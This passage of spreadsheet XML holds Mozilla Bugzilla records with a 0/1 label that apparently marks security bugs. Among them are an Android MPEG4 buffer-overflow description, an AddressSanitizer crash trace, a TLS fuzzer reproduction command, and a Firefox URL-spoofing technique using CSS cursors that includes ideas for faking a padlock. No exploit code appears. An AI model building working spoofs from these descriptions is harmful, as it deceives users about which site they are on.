        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4002" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4002" t="inlineStr">
        <is>
          <t>mozilla45</t>
        </is>
      </c>
      <c r="T4002" t="n">
        <v>1</v>
      </c>
      <c r="U4002" t="n">
        <v>0</v>
      </c>
      <c r="V4002" t="n">
        <v>37</v>
      </c>
      <c r="W4002" t="inlineStr">
        <is>
          <t>AndroidID-20923261, patched in May 2015, published in August 2015:
https://android.googlesource.com/platform/frameworks/av/+/c87faed60483afb2466e03892bda80b72e5822c7%5E!/#F0
"Fix integer underflow in covr MPEG4 processing
When the 'chunk_data_size' variable is less than 'kSkipBytesOfDataBox', an
integer underflow can occur. This causes an extraordinarily large value to
be passed to MetaData::setData, leading to a buffer overflow."
As well as fixing the underflow there, Metadata::setData and dependent methods could do with more checks before/after allocating memory and copying data.
As the malloc in Metadata could be given an enormous value, and the return pointer is not checked, and data is blindly copied there, it should be considered a potential security risk (though probably just a crash risk, but let's keep it hidden for now).</t>
        </is>
      </c>
      <c r="X4002" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4003">
      <c r="A4003" t="n">
        <v>1152922</v>
      </c>
      <c r="B4003" t="inlineStr">
        <is>
          <t>2015-04-09 11:57:24 -0700</t>
        </is>
      </c>
      <c r="C4003" t="inlineStr">
        <is>
          <t>correlations sig/os order wrong</t>
        </is>
      </c>
      <c r="D4003" t="inlineStr">
        <is>
          <t>2015-04-09 13:28:59 -0700</t>
        </is>
      </c>
      <c r="E4003" t="n">
        <v>1</v>
      </c>
      <c r="F4003" t="n">
        <v>1</v>
      </c>
      <c r="G4003" t="n">
        <v>4</v>
      </c>
      <c r="H4003" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I4003" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J4003" t="inlineStr">
        <is>
          <t>Webapp</t>
        </is>
      </c>
      <c r="K4003" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4003" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4003" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4003" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4003" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4003" t="inlineStr"/>
      <c r="Q4003" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4003" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4003" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4003" t="n">
        <v>1</v>
      </c>
      <c r="U4003" t="n">
        <v>0</v>
      </c>
      <c r="V4003" t="n">
        <v>2</v>
      </c>
      <c r="W4003" t="inlineStr">
        <is>
          <t>The webapp tries to helpfully annotate the column headers on correlations output:
https://crash-stats.mozilla.com/report/list?signature=CCreateDeviceCache%3A%3ACUMDAdapterCache%3A%3ALoad%28IDXGIAdapterInternal2*%2C%20_KMTUMDVERSION%2C%20unsigned%20int%29#tab-correlations
Unfortunately, it gets the order wrong - you can see where the columns are printed here:
http://hg.mozilla.org/users/dbaron_mozilla.com/crash-data-tools/file/1d89f1cb1b8a/per-crash-interesting-modules.py#l190
You can see there that in_sig_count/ratio is printed first, followed by in_os_count/ratio.
Also, there's a minor visual issue - missing end paren in the first two columns e.g.:
96% (195/203</t>
        </is>
      </c>
      <c r="X4003" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4004">
      <c r="A4004" t="n">
        <v>592368</v>
      </c>
      <c r="B4004" t="inlineStr">
        <is>
          <t>2010-08-31 11:47:41 -0700</t>
        </is>
      </c>
      <c r="C4004" t="inlineStr">
        <is>
          <t>Licensing info is missing from create collection page</t>
        </is>
      </c>
      <c r="D4004" t="inlineStr">
        <is>
          <t>2016-02-04 14:48:15 -0800</t>
        </is>
      </c>
      <c r="E4004" t="n">
        <v>1</v>
      </c>
      <c r="F4004" t="n">
        <v>1</v>
      </c>
      <c r="G4004" t="n">
        <v>6</v>
      </c>
      <c r="H4004" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I4004" t="inlineStr">
        <is>
          <t>addons.mozilla.org Graveyard</t>
        </is>
      </c>
      <c r="J4004" t="inlineStr">
        <is>
          <t>Collections</t>
        </is>
      </c>
      <c r="K4004" t="inlineStr">
        <is>
          <t>4.x</t>
        </is>
      </c>
      <c r="L4004" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4004" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4004" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4004" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4004" t="inlineStr">
        <is>
          <t>[z]</t>
        </is>
      </c>
      <c r="Q4004" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4004" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S4004" t="inlineStr">
        <is>
          <t>5.11.9</t>
        </is>
      </c>
      <c r="T4004" t="n">
        <v>1</v>
      </c>
      <c r="U4004" t="n">
        <v>0</v>
      </c>
      <c r="V4004" t="n">
        <v>4</v>
      </c>
      <c r="W4004" t="inlineStr">
        <is>
          <t>As per the spec,when adding an add-on to a new collection,there is the following licensing info below Privacy Setting-
"As noted below and in our [Legal Notices], individual collection arrangements are governed by the Creative Commons Attribution Share-Alike License" 
This is missing in the implementation</t>
        </is>
      </c>
      <c r="X4004" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4005">
      <c r="A4005" t="n">
        <v>1297934</v>
      </c>
      <c r="B4005" t="inlineStr">
        <is>
          <t>2016-08-24 21:36:03 -0700</t>
        </is>
      </c>
      <c r="C4005" t="inlineStr">
        <is>
          <t>Bad cast in nsImageGeometryMixin</t>
        </is>
      </c>
      <c r="D4005" t="inlineStr">
        <is>
          <t>2024-05-30 09:21:02 -0700</t>
        </is>
      </c>
      <c r="E4005" t="n">
        <v>1</v>
      </c>
      <c r="F4005" t="n">
        <v>1</v>
      </c>
      <c r="G4005" t="n">
        <v>3</v>
      </c>
      <c r="H4005" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4005" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4005" t="inlineStr">
        <is>
          <t>Layout</t>
        </is>
      </c>
      <c r="K4005" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4005" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4005" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4005" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4005" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4005" t="inlineStr">
        <is>
          <t>[adv-main49+][adv-esr45.4+]</t>
        </is>
      </c>
      <c r="Q4005" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4005" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4005" t="inlineStr">
        <is>
          <t>mozilla51</t>
        </is>
      </c>
      <c r="T4005" t="n">
        <v>1</v>
      </c>
      <c r="U4005" t="n">
        <v>0</v>
      </c>
      <c r="V4005" t="n">
        <v>29</v>
      </c>
      <c r="W4005" t="inlineStr">
        <is>
          <t>Created attachment 8784672
Testcase
1. Load testcase and press Tab to trigger.
2. Looks like a bad cast / type confusion issue.
auto lastGeometry =
      static_cast&lt;T*&gt;(mozilla::FrameLayerBuilder::GetMostRecentGeometry(aItem));
    if (lastGeometry) {
      mLastDrawResult = lastGeometry-&gt;mLastDrawResult; // crashing here.
==6679==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60b0004e5028 at pc 0x7f0c222bbb93 bp 0x7fffba9ec040 sp 0x7fffba9ec038
READ of size 1 at 0x60b0004e5028 thread T0 (Web Content)
    #0 0x7f0c222bbb92 in nsImageGeometryMixin layout/base/nsDisplayListInvalidation.h:101:39
    #1 0x7f0c222bbb92 in nsDisplayItemGenericImageGeometry layout/base/nsDisplayListInvalidation.h:163
    #2 0x7f0c222bbb92 in nsDisplayRangeFocusRing::AllocateGeometry(nsDisplayListBuilder*) layout/forms/nsRangeFrame.cpp:202
    #3 0x7f0c21c3d579 in mozilla::FrameLayerBuilder::ComputeGeometryChangeForItem(mozilla::FrameLayerBuilder::DisplayItemData*) layout/base/FrameLayerBuilder.cpp:4366:22
    #4 0x7f0c21c3c5ce in mozilla::FrameLayerBuilder::WillEndTransaction() layout/base/FrameLayerBuilder.cpp:1901:7
    #5 0x7f0c21dcbc5f in nsDisplayList::PaintRoot(nsDisplayListBuilder*, nsRenderingContext*, unsigned int) layout/base/nsDisplayList.cpp:1894:17
    #6 0x7f0c21e7cd99 in nsLayoutUtils::PaintFrame(nsRenderingContext*, nsIFrame*, nsRegion const&amp;, unsigned int, nsDisplayListBuilderMode, nsLayoutUtils::PaintFrameFlags) layout/base/nsLayoutUtils.cpp:3603:10
    #7 0x7f0c21f05989 in PresShell::Paint(nsView*, nsRegion const&amp;, unsigned int) layout/base/nsPresShell.cpp:6640:5
    #8 0x7f0c214bda0c in nsViewManager::ProcessPendingUpdatesPaint(nsIWidget*) view/nsViewManager.cpp:484:19
    #9 0x7f0c214bc6ae in nsViewManager::ProcessPendingUpdatesForView(nsView*, bool) view/nsViewManager.cpp:415:33
    #10 0x7f0c214c051d in nsViewManager::ProcessPendingUpdates() view/nsViewManager.cpp:1118:5
    #11 0x7f0c21bf3b99 in nsRefreshDriver::Tick(long, mozilla::TimeStamp) layout/base/nsRefreshDriver.cpp:1898:9
    #12 0x7f0c21bfeccd in TickDriver layout/base/nsRefreshDriver.cpp:275:13
    #13 0x7f0c21bfeccd in mozilla::RefreshDriverTimer::TickRefreshDrivers(long, mozilla::TimeStamp, nsTArray&lt;RefPtr&lt;nsRefreshDriver&gt; &gt;&amp;) layout/base/nsRefreshDriver.cpp:247
    #14 0x7f0c21bfe929 in mozilla::RefreshDriverTimer::Tick(long, mozilla::TimeStamp) layout/base/nsRefreshDriver.cpp:266:5
    #15 0x7f0c21c00934 in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::NotifyVsync(mozilla::TimeStamp) layout/base/nsRefreshDriver.cpp:426:9
    #16 0x7f0c2259ae74 in mozilla::layout::VsyncChild::RecvNotify(mozilla::TimeStamp const&amp;) layout/ipc/VsyncChild.cpp:64:16
    #17 0x7f0c1be65f39 in mozilla::layout::PVsyncChild::OnMessageReceived(IPC::Message const&amp;) objdir-ff-asan/ipc/ipdl/PVsyncChild.cpp:240:20
    #18 0x7f0c1b8b1151 in mozilla::ipc::PBackgroundChild::OnMessageReceived(IPC::Message const&amp;) objdir-ff-asan/ipc/ipdl/PBackgroundChild.cpp:2048:28
    #19 0x7f0c1b7da134 in mozilla::ipc::MessageChannel::DispatchAsyncMessage(IPC::Message const&amp;) ipc/glue/MessageChannel.cpp:1662:25
    #20 0x7f0c1b7d68f7 in mozilla::ipc::MessageChannel::DispatchMessage(IPC::Message&amp;&amp;) ipc/glue/MessageChannel.cpp:1600:17
    #21 0x7f0c1b7c3bff in mozilla::ipc::MessageChannel::OnMaybeDequeueOne() ipc/glue/MessageChannel.cpp:1567:5
    #22 0x7f0c1b7f4a62 in applyImpl&lt;mozilla::ipc::MessageChannel, bool (mozilla::ipc::MessageChannel::*)()&gt; objdir-ff-asan/dist/include/nsThreadUtils.h:729:12
    #23 0x7f0c1b7f4a62 in apply&lt;mozilla::ipc::MessageChannel, bool (mozilla::ipc::MessageChannel::*)()&gt; objdir-ff-asan/dist/include/nsThreadUtils.h:735
    #24 0x7f0c1b7f4a62 in mozilla::detail::RunnableMethodImpl&lt;bool (mozilla::ipc::MessageChannel::*)(), false, true&gt;::Run() objdir-ff-asan/dist/include/nsThreadUtils.h:764
    #25 0x7f0c1b7f42ef in Run objdir-ff-asan/dist/include/mozilla/ipc/MessageChannel.h:545:29
    #26 0x7f0c1b7f42ef in mozilla::ipc::MessageChannel::DequeueTask::Run() objdir-ff-asan/dist/include/mozilla/ipc/MessageChannel.h:564
    #27 0x7f0c1aa15a1e in nsThread::ProcessNextEvent(bool, bool*) xpcom/threads/nsThread.cpp:1058:14
    #28 0x7f0c1aa965e8 in NS_ProcessNextEvent(nsIThread*, bool) xpcom/glue/nsThreadUtils.cpp:290:10
    #29 0x7f0c1b7e17a1 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) ipc/glue/MessagePump.cpp:96:21
    #30 0x7f0c1b754ad0 in RunInternal ipc/chromium/src/base/message_loop.cc:232:10
    #31 0x7f0c1b754ad0 in RunHandler ipc/chromium/src/base/message_loop.cc:225
    #32 0x7f0c1b754ad0 in MessageLoop::Run() ipc/chromium/src/base/message_loop.cc:205
    #33 0x7f0c2153565f in nsBaseAppShell::Run() widget/nsBaseAppShell.cpp:156:27
    #34 0x7f0c236e7697 in XRE_RunAppShell toolkit/xre/nsEmbedFunctions.cpp:846:22
    #35 0x7f0c1b754ad0 in RunInternal ipc/chromium/src/base/message_loop.cc:232:10
    #36 0x7f0c1b754ad0 in RunHandler ipc/chromium/src/base/message_loop.cc:225
    #37 0x7f0c1b754ad0 in MessageLoop::Run() ipc/chromium/src/base/message_loop.cc:205
    #38 0x7f0c236e6d58 in XRE_InitChildProcess toolkit/xre/nsEmbedFunctions.cpp:676:34
    #39 0x511ab3 in content_process_main ipc/contentproc/plugin-container.cpp:197:19
    #40 0x511ab3 in main browser/app/nsBrowserApp.cpp:369
    #41 0x7f0c348e9f44 in __libc_start_main /build/eglibc-oGUzwX/eglibc-2.19/csu/libc-start.c:287
0x60b0004e5028 is located 0 bytes to the right of 40-byte region [0x60b0004e5000,0x60b0004e5028)
allocated by thread T0 (Web Content) here:
    #0 0x4d5cc8 in malloc _asan_rtl_
    #1 0x51296d in moz_xmalloc memory/mozalloc/mozalloc.cpp:110:17
    #2 0x7f0c21f3009e in operator new objdir-ff-asan/dist/include/mozilla/mozalloc.h:193:12
    #3 0x7f0c21f3009e in nsDisplayItem::AllocateGeometry(nsDisplayListBuilder*) layout/base/nsDisplayList.h:1484
    #4 0x7f0c21c3d579 in mozilla::FrameLayerBuilder::ComputeGeometryChangeForItem(mozilla::FrameLayerBuilder::DisplayItemData*) layout/base/FrameLayerBuilder.cpp:4366:22
    #5 0x7f0c21c3c5ce in mozilla::FrameLayerBuilder::WillEndTransaction() layout/base/FrameLayerBuilder.cpp:1901:7
    #6 0x7f0c21dcbc5f in nsDisplayList::PaintRoot(nsDisplayListBuilder*, nsRenderingContext*, unsigned int) layout/base/nsDisplayList.cpp:1894:17
    #7 0x7f0c21e7cd99 in nsLayoutUtils::PaintFrame(nsRenderingContext*, nsIFrame*, nsRegion const&amp;, unsigned int, nsDisplayListBuilderMode, nsLayoutUtils::PaintFrameFlags) layout/base/nsLayoutUtils.cpp:3603:10
    #8 0x7f0c21f05989 in PresShell::Paint(nsView*, nsRegion const&amp;, unsigned int) layout/base/nsPresShell.cpp:6640:5
    #9 0x7f0c214bda0c in nsViewManager::ProcessPendingUpdatesPaint(nsIWidget*) view/nsViewManager.cpp:484:19
    #10 0x7f0c214bc6ae in nsViewManager::ProcessPendingUpdatesForView(nsView*, bool) view/nsViewManager.cpp:415:33
    #11 0x7f0c214c051d in nsViewManager::ProcessPendingUpdates() view/nsViewManager.cpp:1118:5
    #12 0x7f0c21bf3b99 in nsRefreshDriver::Tick(long, mozilla::TimeStamp) layout/base/nsRefreshDriver.cpp:1898:9
    #13 0x7f0c21bfeccd in TickDriver layout/base/nsRefreshDriver.cpp:275:13
    #14 0x7f0c21bfeccd in mozilla::RefreshDriverTimer::TickRefreshDrivers(long, mozilla::TimeStamp, nsTArray&lt;RefPtr&lt;nsRefreshDriver&gt; &gt;&amp;) layout/base/nsRefreshDriver.cpp:247
    #15 0x7f0c21bfe929 in mozilla::RefreshDriverTimer::Tick(long, mozilla::TimeStamp) layout/base/nsRefreshDriver.cpp:266:5
    #16 0x7f0c21c00934 in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::NotifyVsync(mozilla::TimeStamp) layout/base/nsRefreshDriver.cpp:426:9
    #17 0x7f0c2259ae74 in mozilla::layout::VsyncChild::RecvNotify(mozilla::TimeStamp const&amp;) layout/ipc/VsyncChild.cpp:64:16
    #18 0x7f0c1be65f39 in mozilla::layout::PVsyncChild::OnMessageReceived(IPC::Message const&amp;) objdir-ff-asan/ipc/ipdl/PVsyncChild.cpp:240:20
    #19 0x7f0c1b8b1151 in mozilla::ipc::PBackgroundChild::OnMessageReceived(IPC::Message const&amp;) objdir-ff-asan/ipc/ipdl/PBackgroundChild.cpp:2048:28
    #20 0x7f0c1b7da134 in mozilla::ipc::MessageChannel::DispatchAsyncMessage(IPC::Message const&amp;) ipc/glue/MessageChannel.cpp:1662:25
    #21 0x7f0c1b7d68f7 in mozilla::ipc::MessageChannel::DispatchMessage(IPC::Message&amp;&amp;) ipc/glue/MessageChannel.cpp:1600:17
    #22 0x7f0c1b7c3bff in mozilla::ipc::MessageChannel::OnMaybeDequeueOne() ipc/glue/MessageChannel.cpp:1567:5
    #23 0x7f0c1b7f4a62 in applyImpl&lt;mozilla::ipc::MessageChannel, bool (mozilla::ipc::MessageChannel::*)()&gt; objdir-ff-asan/dist/include/nsThreadUtils.h:729:12
    #24 0x7f0c1b7f4a62 in apply&lt;mozilla::ipc::MessageChannel, bool (mozilla::ipc::MessageChannel::*)()&gt; objdir-ff-asan/dist/include/nsThreadUtils.h:735
    #25 0x7f0c1b7f4a62 in mozilla::detail::RunnableMethodImpl&lt;bool (mozilla::ipc::MessageChannel::*)(), false, true&gt;::Run() objdir-ff-asan/dist/include/nsThreadUtils.h:764
    #26 0x7f0c1b7f42ef in Run objdir-ff-asan/dist/include/mozilla/ipc/MessageChannel.h:545:29
    #27 0x7f0c1b7f42ef in mozilla::ipc::MessageChannel::DequeueTask::Run() objdir-ff-asan/dist/include/mozilla/ipc/MessageChannel.h:564
    #28 0x7f0c1aa15a1e in nsThread::ProcessNextEvent(bool, bool*) xpcom/threads/nsThread.cpp:1058:14
    #29 0x7f0c1aa965e8 in NS_ProcessNextEvent(nsIThread*, bool) xpcom/glue/nsThreadUtils.cpp:290:10
    #30 0x7f0c1b7e17a1 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) ipc/glue/MessagePump.cpp:96:21
    #31 0x7f0c1b754ad0 in RunInternal ipc/chromium/src/base/message_loop.cc:232:10
    #32 0x7f0c1b754ad0 in RunHandler ipc/chromium/src/base/message_loop.cc:225
    #33 0x7f0c1b754ad0 in MessageLoop::Run() ipc/chromium/src/base/message_loop.cc:205
    #34 0x7f0c2153565f in nsBaseAppShell::Run() widget/nsBaseAppShell.cpp:156:27
    #35 0x7f0c236e7697 in XRE_RunAppShell toolkit/xre/nsEmbedFunctions.cpp:846:22
    #36 0x7f0c1b754ad0 in RunInternal ipc/chromium/src/base/message_loop.cc:232:10
    #37 0x7f0c1b754ad0 in RunHandler ipc/chromium/src/base/message_loop.cc:225
    #38 0x7f0c1b754ad0 in MessageLoop::Run() ipc/chromium/src/base/message_loop.cc:205
SUMMARY: AddressSanitizer: heap-buffer-overflow (/mnt/scratch0/clusterfuzz/slave-bot/builds/linux_asan_firefox/custom/firefox/libxul.so+0x9805b92)
Shadow bytes around the buggy address:
  0x0c16800949b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fd fd
  0x0c16800949c0: fd fd fd fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c16800949d0: fa fa fa fa 00 00 00 00 00 00 fa fa fa fa fa fa
  0x0c16800949e0: fa fa fa fa fa fa fa fa fa fa 00 00 00 00 00 fa
  0x0c16800949f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=&gt;0x0c1680094a00: 00 00 00 00 00[fa]fa fa fa fa fa fa fa fa fa fa
  0x0c1680094a10: fa fa fa fa fa fa 00 00 00 00 00 fa fa fa fa fa
  0x0c1680094a20: fa fa fa fa fa fa fa fa fa fa fa fa fd fd fd fd
  0x0c1680094a30: fd fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c1680094a40: fa fa fd fd fd fd fd fa fa fa fa fa fa fa fa fa
  0x0c1680094a50: fa fa fa fa fa fa fa fa fd fd fd fd fd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6679==ABORTING</t>
        </is>
      </c>
      <c r="X4005" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4006">
      <c r="A4006" t="n">
        <v>361298</v>
      </c>
      <c r="B4006" t="inlineStr">
        <is>
          <t>2006-11-20 10:42:42 -0800</t>
        </is>
      </c>
      <c r="C4006" t="inlineStr">
        <is>
          <t>URL spoof using custom cursor with CSS3 hotspot</t>
        </is>
      </c>
      <c r="D4006" t="inlineStr">
        <is>
          <t>2007-10-04 18:02:36 -0700</t>
        </is>
      </c>
      <c r="E4006" t="n">
        <v>1</v>
      </c>
      <c r="F4006" t="n">
        <v>1</v>
      </c>
      <c r="G4006" t="n">
        <v>3</v>
      </c>
      <c r="H4006" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4006" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4006" t="inlineStr">
        <is>
          <t>Layout</t>
        </is>
      </c>
      <c r="K4006" t="inlineStr">
        <is>
          <t>1.8 Branch</t>
        </is>
      </c>
      <c r="L4006" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4006" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N4006" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4006" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4006" t="inlineStr">
        <is>
          <t>[sg:moderate]</t>
        </is>
      </c>
      <c r="Q4006" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4006" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4006" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4006" t="n">
        <v>1</v>
      </c>
      <c r="U4006" t="n">
        <v>0</v>
      </c>
      <c r="V4006" t="n">
        <v>22</v>
      </c>
      <c r="W4006" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0
The URL bar can be spoofed by using a large, mostly transparent custom cursor image and dynamically modifying the hotspot coordinates as per CSS3 specs (http://www.w3.org/TR/css3-ui/#cursor). Cursors will overflow outside of the browser content area. Affects Firefox 1.5 and later.
Reproducible: Always
This spoof will not work if the mouse cursor leaves the browser content area, and may not be pixel-perfect depending upon the users' configuration of Firefox.
Due to poor performance, it is not a viable option to leave the spoof URL image as a cursor constantly. It will cause an obvious jitter effect on the URL bar when the mouse is moved, especially if the spoof image is large to accommodate large browser windows. A cleverly crafted attack site would try to minimize the amount of mouse movement, and keep the mouse movement near the top of the page.
In the attached example, the spoof URL image is disabled when the mouse moves. This exposes the true URL while the mouse is moving, but a cleverly crafted host URL could make this "switch" appear to be a glitch causing a character to be transposed with another character, something many users may not even notice.
To be even more creative, one could dynamically generate spoof URL images using a canvas and toDataURL(). This would be useful to provide the illusion that the site is using encryption. Since the full URL bar would have to be overlayed with a yellow box and padlock icon, the image width could be determined dynamically, assuming that all users have the search box and "Go" button visible on their browser.
The attached example could use more fine tuning with regards to mouseover events due to the fake cursor image being displayed. For example, to make the status bar text persist for anchors when the mouse stops moving by wrapping the spoof cursor image in an anchor tag with the same href as the anchor below the image.</t>
        </is>
      </c>
      <c r="X4006" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4007">
      <c r="A4007" t="n">
        <v>1590001</v>
      </c>
      <c r="B4007" t="inlineStr">
        <is>
          <t>2019-10-20 23:55:49 -0700</t>
        </is>
      </c>
      <c r="C4007" t="inlineStr">
        <is>
          <t>tls-server-no_fuzzer_mode: ASSERT: ss-&gt;ssl3.hs.ws == wait_client_hello, at ../../lib/ssl/ssl3con.c:12805</t>
        </is>
      </c>
      <c r="D4007" t="inlineStr">
        <is>
          <t>2020-12-18 17:01:23 -0800</t>
        </is>
      </c>
      <c r="E4007" t="n">
        <v>1</v>
      </c>
      <c r="F4007" t="n">
        <v>1</v>
      </c>
      <c r="G4007" t="n">
        <v>3</v>
      </c>
      <c r="H4007" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4007" t="inlineStr">
        <is>
          <t>NSS</t>
        </is>
      </c>
      <c r="J4007" t="inlineStr">
        <is>
          <t>Libraries</t>
        </is>
      </c>
      <c r="K4007" t="inlineStr">
        <is>
          <t>3.48</t>
        </is>
      </c>
      <c r="L4007" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4007" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4007" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4007" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4007" t="inlineStr">
        <is>
          <t>[disclosure deadline january 2020][adv-main72+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q4007" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4007" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4007" t="inlineStr">
        <is>
          <t>3.49</t>
        </is>
      </c>
      <c r="T4007" t="n">
        <v>1</v>
      </c>
      <c r="U4007" t="n">
        <v>0</v>
      </c>
      <c r="V4007" t="n">
        <v>19</v>
      </c>
      <c r="W4007" t="inlineStr">
        <is>
          <t>Created attachment 9102877
testcase
The fuzzer found an issue.
Marking this as critical as it appears to be a state machine issue in TLS 1.3 (`ssl3con.c:12805`), i.e. the state is `ssl_ct_application_data` and `ssl_0rtt_ignore_hrr` while not waiting for a client hello (`wait_client_hello`).
I recommend removing the offending code change https://hg.mozilla.org/projects/nss/rev/bc77cf318f388f55790b99d5f23a9c1f2bd9f900?revcount=10000, i.e. disable TLS 1.3 again until the issue is fixed.
To reproduce build nss with `./build.sh --fuzz --asan` and run `LD_LIBRARY_PATH=../dist/Debug/lib/ nssfuzz-tls-server testcase`.</t>
        </is>
      </c>
      <c r="X4007" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4008">
      <c r="A4008" t="n">
        <v>1443251</v>
      </c>
      <c r="B4008" t="inlineStr">
        <is>
          <t>2018-03-05 11:25:52 -0800</t>
        </is>
      </c>
      <c r="C4008" t="inlineStr">
        <is>
          <t>Remove Treeherder support for Buildbot</t>
        </is>
      </c>
      <c r="D4008" t="inlineStr">
        <is>
          <t>2019-02-18 10:18:25 -0800</t>
        </is>
      </c>
      <c r="E4008" t="n">
        <v>1</v>
      </c>
      <c r="F4008" t="n">
        <v>1</v>
      </c>
      <c r="G4008" t="n">
        <v>7</v>
      </c>
      <c r="H4008" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I4008" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J4008" t="inlineStr">
        <is>
          <t>Treeherder: Data Ingestion</t>
        </is>
      </c>
      <c r="K4008" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L4008" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4008" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4008" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4008" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4008" t="inlineStr"/>
      <c r="Q4008" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4008" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4008" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4008" t="n">
        <v>1</v>
      </c>
      <c r="U4008" t="n">
        <v>0</v>
      </c>
      <c r="V4008" t="n">
        <v>13</v>
      </c>
      <c r="W4008" t="inlineStr">
        <is>
          <t>The Buildbot to Taskcluster migration is getting closer to completion:
https://atlee.ca/blog/posts/migration-status-2.html
Pre-requisites before Treeherder can remove support:
* Last of release automation tasks migrated (bug 1397762)
* ESR52 (which still uses Buildbot) to be EOLed (currently ~August 2018: https://wiki.mozilla.org/RapidRelease/Calendar)
* Thunderbird/comm-central to have switched over to Taskcluster (bug 1384205)
* ...?</t>
        </is>
      </c>
      <c r="X4008" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4009">
      <c r="A4009" t="n">
        <v>648464</v>
      </c>
      <c r="B4009" t="inlineStr">
        <is>
          <t>2011-04-07 20:09:44 -0700</t>
        </is>
      </c>
      <c r="C4009" t="inlineStr">
        <is>
          <t>Fx4 upgrade INFLUENCER campaign - update PDFs</t>
        </is>
      </c>
      <c r="D4009" t="inlineStr">
        <is>
          <t>2012-08-23 00:16:07 -0700</t>
        </is>
      </c>
      <c r="E4009" t="n">
        <v>1</v>
      </c>
      <c r="F4009" t="n">
